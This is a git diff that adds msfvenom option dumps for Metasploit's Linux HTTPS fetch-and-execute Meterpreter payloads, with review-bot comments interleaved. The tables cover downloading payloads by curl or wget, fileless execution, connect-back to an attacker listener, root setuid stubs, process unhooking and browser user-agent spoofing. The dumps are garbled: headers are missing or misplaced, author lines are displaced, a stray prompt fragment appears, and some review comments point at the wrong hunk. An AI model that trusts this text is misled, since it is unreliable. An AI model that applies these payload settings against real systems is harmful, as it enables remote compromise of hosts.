+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi 
template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no 
encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..f80f575 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt 
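Review bot: this hunk has lost its "Provided by" block entirely, the options heading is truncated to "options:" (the "Basic " prefix is gone), and the "Rank:" line that the x64/exec file in this patch carries is missing, with the "Evasion options for payload/cmd/linux/https/x64/meterpreter/bind_tcp:" header sitting where the author list should be. Regenerate this dump and compare its header section against the intact cmd-linux-https-x64-exec.txt before committing. "Platform: Linux, Linux" is duplicated; if that is what the tool prints it is an upstream cosmetic issue to report, not something to hand-edit in this dump.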
@@ -0,0 +1,108 @@ + + Name: HTTPS Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/https/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/reverse_sctp: +========================= + +man@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xbmVmIaMlDxy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..7ceaa68 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt 
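Review bot: same capture damage in this hunk: no "Provided by" block, no "Rank:" line, and the stray fragment "man@sempervictus>" under the "Evasion options for payload/cmd/linux/https/x64/meterpreter/reverse_sctp:" header. Please regenerate. Separately, the FETCH_FILELESS description "requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)" has an unclosed parenthesis; that text comes from the module's option definition, so it is an upstream fix rather than an edit to this dump.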
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/reverse_tcp: +========================= + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UjLUgAiFVlch no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..7584702 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt 
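Review bot: The FETCH_FILENAME default in the hunk for payload/cmd/linux/https/x64/meterpreter/reverse_tcp (UjLUgAiFVlch here) is a fresh random string on every msfvenom run, so each regeneration of this dump, and of every other payload_options file in this patch, will produce a spurious one-row diff; either substitute a fixed placeholder for that value before committing or state in the repository that the row is expected to churn. Two smaller points in the same hunk: its header lacks the "Rank:" and "Provided by:" lines that the other dumps in this patch carry, so check whether msfvenom omitted them or the capture truncated the header, and it prints "Platform: Linux, Linux", a duplicated platform entry that belongs in an upstream report rather than a hand edit here. The "Evasion options for ..." heading is followed by no rows at all, so the empty section could be dropped from the dump to keep the file readable.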
@@ -0,0 +1,108 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WNUGZeWJMKBe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..00b43ff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt 
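Review bot: In the hunk for cmd-linux-https-x64-meterpreter_reverse_http.txt the author line "timwr" lands under the empty "Evasion options for ..." heading instead of under "Provided by:", which is where the pingback_bind_tcp dump in this same patch lists its authors; that ordering suggests the capture interleaved two output streams, so regenerate the file with the streams captured in sequence and check the identical displacement in the meterpreter_reverse_https and meterpreter_reverse_tcp dumps. Also verify that the committed HttpUnknownRequestResponse row keeps its default value intact: the description calls it the returned HTML response body, yet the value shows here as a bare "It works!" split across blank lines, which breaks the table layout for that row.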
@@ -0,0 +1,110 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WvlrifNZqe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..298028c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_tcp: +========================= + + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BLSXCKxvN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
